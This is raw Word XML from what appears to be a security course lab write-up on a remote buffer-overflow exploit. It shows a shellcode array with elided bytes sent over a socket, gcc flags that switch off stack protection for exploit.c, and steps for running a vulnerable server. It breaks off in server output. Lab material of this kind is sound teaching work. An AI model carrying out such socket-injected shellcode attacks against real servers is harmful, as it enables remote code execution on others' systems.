                                <w:highlight w:val="yellow"/>
                              </w:rPr>
                              <w:t>unsigned char shellcode[4096]=</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2A2FD650" w14:textId="20CF8172" w:rsidR="00CE1109" w:rsidRPr="00703B5B" w:rsidRDefault="00CE1109" w:rsidP="00CE1109">
                            <w:pPr>
                              <w:spacing w:line="160" w:lineRule="exact"/>
                              <w:rPr>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                                <w:highlight w:val="yellow"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00703B5B">
                              <w:rPr>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                                <w:highlight w:val="yellow"/>
                              </w:rPr>
                              <w:t>“\x31…\80”</w:t>
                            </w:r>
                            <w:r w:rsidR="00D83311" w:rsidRPr="00703B5B">
                              <w:rPr>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                                <w:highlight w:val="yellow"/>
                              </w:rPr>
                              <w:t>……</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="67B55E1A" w14:textId="79ADEAE5" w:rsidR="00CE1109" w:rsidRPr="00703B5B" w:rsidRDefault="00CE1109" w:rsidP="00CE1109">
                            <w:pPr>
                              <w:spacing w:line="160" w:lineRule="exact"/>
                              <w:rPr>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                                <w:highlight w:val="yellow"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00703B5B">
                              <w:rPr>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                                <w:highlight w:val="yellow"/>
                              </w:rPr>
                              <w:t>“\x52…\80”;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="484B8317" w14:textId="5073EDBA" w:rsidR="00CE1109" w:rsidRPr="00D83311" w:rsidRDefault="00CE1109" w:rsidP="00CE1109">
                            <w:pPr>
                              <w:spacing w:line="160" w:lineRule="exact"/>
                              <w:rPr>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00703B5B">
                              <w:rPr>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                                <w:highlight w:val="yellow"/>
                              </w:rPr>
                              <w:t>write(</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="00703B5B">
                              <w:rPr>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                                <w:highlight w:val="yellow"/>
                              </w:rPr>
                              <w:t>sockfd</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00703B5B">
                              <w:rPr>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                                <w:highlight w:val="yellow"/>
                              </w:rPr>
                              <w:t>, shellcode, 4096);</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1AECCAFA" w14:textId="77777777" w:rsidR="00CE1109" w:rsidRPr="00D83311" w:rsidRDefault="00CE11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AF15" id="Text Box 18" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:3.95pt;margin-top:278.45pt;width:401.4pt;height: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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7000A690" w14:textId="04B2D987" w:rsidR="00CE1109" w:rsidRPr="00703B5B" w:rsidRDefault="00CE1109" w:rsidP="00CE1109">
                      <w:pPr>
                        <w:spacing w:line="160" w:lineRule="exact"/>
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00703B5B">
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t xml:space="preserve">unsigned char </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00703B5B">
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>shellcode[</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00703B5B">
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>4096]=</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2A2FD650" w14:textId="20CF8172" w:rsidR="00CE1109" w:rsidRPr="00703B5B" w:rsidRDefault="00CE1109" w:rsidP="00CE1109">
                      <w:pPr>
                        <w:spacing w:line="160" w:lineRule="exact"/>
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00703B5B">
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>“\x31…\</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00703B5B">
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>80”</w:t>
                      </w:r>
                      <w:r w:rsidR="00D83311" w:rsidRPr="00703B5B">
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>…</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidR="00D83311" w:rsidRPr="00703B5B">
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>…</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="67B55E1A" w14:textId="79ADEAE5" w:rsidR="00CE1109" w:rsidRPr="00703B5B" w:rsidRDefault="00CE1109" w:rsidP="00CE1109">
                      <w:pPr>
                        <w:spacing w:line="160" w:lineRule="exact"/>
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00703B5B">
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>“\x52…\80”;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="484B8317" w14:textId="5073EDBA" w:rsidR="00CE1109" w:rsidRPr="00D83311" w:rsidRDefault="00CE1109" w:rsidP="00CE1109">
                      <w:pPr>
                        <w:spacing w:line="160" w:lineRule="exact"/>
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00703B5B">
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>write(</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00703B5B">
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>sockfd</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="00703B5B">
                        <w:rPr>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:highlight w:val="yellow"/>
                        </w:rPr>
                        <w:t>, shellcode, 4096);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1AECCAFA" w14:textId="77777777" w:rsidR="00CE1109" w:rsidRPr="00D83311" w:rsidRDefault="00CE1109">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B10D09">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E7B0C3F" wp14:editId="6D2C001E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>335288</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2569146</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4401720" cy="82800"/>
                <wp:effectExtent l="38100" t="57150" r="37465" b="50800"/>
                <wp:wrapNone/>
                <wp:docPr id="87" name="Ink 87"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId77">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="4401720" cy="82800"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="57270E34" id="Ink 87" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:25.7pt;margin-top:201.6pt;width:348.05pt;height:7.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">
                <v:imagedata r:id="rId78" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BB1BA9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251719680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C1BC0DD" wp14:editId="2D647FF3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>246728</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2344680</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2170800" cy="23400"/>
                <wp:effectExtent l="38100" t="38100" r="58420" b="53340"/>
                <wp:wrapNone/>
                <wp:docPr id="86" name="Ink 86"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId79">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2170800" cy="23400"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0B48AABA" id="Ink 86" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:18.75pt;margin-top:183.9pt;width:172.35pt;height:3.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">
                <v:imagedata r:id="rId80" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FA275C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1680025A" wp14:editId="7A1CE254">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>228368</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4357092</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2077560" cy="50040"/>
                <wp:effectExtent l="0" t="38100" r="56515" b="45720"/>
                <wp:wrapNone/>
                <wp:docPr id="49" name="Ink 49"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId81">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2077560" cy="50040"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="006C69E0" id="Ink 49" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:17.3pt;margin-top:342.4pt;width:165.05pt;height:5.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">
                <v:imagedata r:id="rId82" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00FA275C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1752C868" wp14:editId="2CFB1FE2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>338888</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3182052</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2148480" cy="37440"/>
                <wp:effectExtent l="38100" t="38100" r="42545" b="58420"/>
                <wp:wrapNone/>
                <wp:docPr id="48" name="Ink 48"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId83">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2148480" cy="37440"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="5A105B0B" id="Ink 48" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:26pt;margin-top:249.85pt;width:170.55pt;height:4.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">
                <v:imagedata r:id="rId84" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003D4DAD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C311F05" wp14:editId="7172C3A2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>217208</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1117086</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4439520" cy="82080"/>
                <wp:effectExtent l="0" t="57150" r="18415" b="51435"/>
                <wp:wrapNone/>
                <wp:docPr id="47" name="Ink 47"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId85">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="4439520" cy="82080"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1C484FE4" id="Ink 47" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:16.4pt;margin-top:87.25pt;width:350.95pt;height:7.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">
                <v:imagedata r:id="rId86" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005B7EB0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251691008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47035594" wp14:editId="145383F1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>84368</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1367733</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2100600" cy="11160"/>
                <wp:effectExtent l="57150" t="38100" r="52070" b="46355"/>
                <wp:wrapNone/>
                <wp:docPr id="46" name="Ink 46"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <w14:contentPart bwMode="auto" r:id="rId87">
                      <w14:nvContentPartPr>
                        <w14:cNvContentPartPr/>
                      </w14:nvContentPartPr>
                      <w14:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="2100600" cy="11160"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="5A0F7722" id="Ink 46" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:5.95pt;margin-top:107pt;width:166.8pt;height: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">
                <v:imagedata r:id="rId88" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:commentRangeStart w:id="4"/>
      <w:r w:rsidR="0040431C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BDF287D" wp14:editId="1B213527">
            <wp:extent cx="5191125" cy="475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1125" cy="4752975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:commentRangeEnd w:id="4"/>
      <w:r w:rsidR="0011585B">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="4"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C354C1" w14:textId="3E745336" w:rsidR="00316182" w:rsidRDefault="00316182" w:rsidP="002808A1">
      <w:r>
        <w:t xml:space="preserve">Compile </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BE87A3" w14:textId="43528CCB" w:rsidR="00316182" w:rsidRDefault="00316182" w:rsidP="002808A1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316182">
        <w:t>yingjiul@jaguar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316182">
        <w:t xml:space="preserve">:~/cis436/w6$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316182">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316182">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m32 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316182">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316182">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">-stack-protector -z </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316182">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>execstack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316182">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -g </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316182">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316182">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BD47E7" w14:textId="29EE7A91" w:rsidR="00316182" w:rsidRDefault="00316182" w:rsidP="002808A1"/>
    <w:p w14:paraId="6F32E074" w14:textId="77777777" w:rsidR="00AD5BF4" w:rsidRDefault="00AD5BF4" w:rsidP="00AD5BF4">
      <w:r>
        <w:t xml:space="preserve">5. Implementation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD9AC2B" w14:textId="480EBB55" w:rsidR="00AD5BF4" w:rsidRDefault="00AD5BF4" w:rsidP="00AD5BF4">
      <w:r>
        <w:t xml:space="preserve">In this exploit, we run </w:t>
      </w:r>
      <w:r w:rsidR="00E16981">
        <w:t>both</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5AA3">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> server program </w:t>
      </w:r>
      <w:r w:rsidR="00E16981">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5AA3">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> client program </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="00E16981">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>184.171.124.101</w:t>
      </w:r>
      <w:r w:rsidR="00E16981" w:rsidRPr="00861B2E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EAB740" w14:textId="07741444" w:rsidR="0040431C" w:rsidRDefault="00AD5BF4" w:rsidP="00AD5BF4">
      <w:r>
        <w:t xml:space="preserve">Step 1 The first step is to execute </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70CD3">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>./server</w:t>
      </w:r>
      <w:r w:rsidR="00B33EBE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B33EBE" w:rsidRPr="00B33EBE">
        <w:t>on jaguar</w:t>
      </w:r>
      <w:r>
        <w:t>. The server</w:t>
      </w:r>
      <w:r w:rsidR="00B33EBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>listen</w:t>
      </w:r>
      <w:r w:rsidR="00B33EBE">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to all connections</w:t>
      </w:r>
      <w:r w:rsidR="00AD7C34">
        <w:t xml:space="preserve"> from 5123</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F53C58" w14:textId="6BE8EB32" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00AD5BF4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251727872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6193C8B0" wp14:editId="2AE48B99">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-12526</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>39144</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5210827" cy="2334016"/>
                <wp:effectExtent l="0" t="0" r="27940" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="23" name="Text Box 23"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5210827" cy="2334016"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:ln w="6350">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="78893151" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>yingjiul@jaguar</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">:~/cis436/w6$ </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00B3148E">
                              <w:rPr>
                                <w:color w:val="4472C4" w:themeColor="accent1"/>
                              </w:rPr>
                              <w:t>server</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4235DB6C" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                            <w:r>
                              <w:t>server is ready...</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="272FA6C3" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>handle_conn</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="6A1D4939" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                            <w:r>
                              <w:t>receive data address is in range: 0xf7729000-0xf772a000</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="008F0D5E" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>handle_conn</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="0B0073B8" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                            <w:r>
                              <w:t>receive data address is in range: 0xf7729000-0xf772a000</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2B63FF89" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>handle_conn</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="4FA682E8" w14:textId="364EF7C2" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                            <w:r>
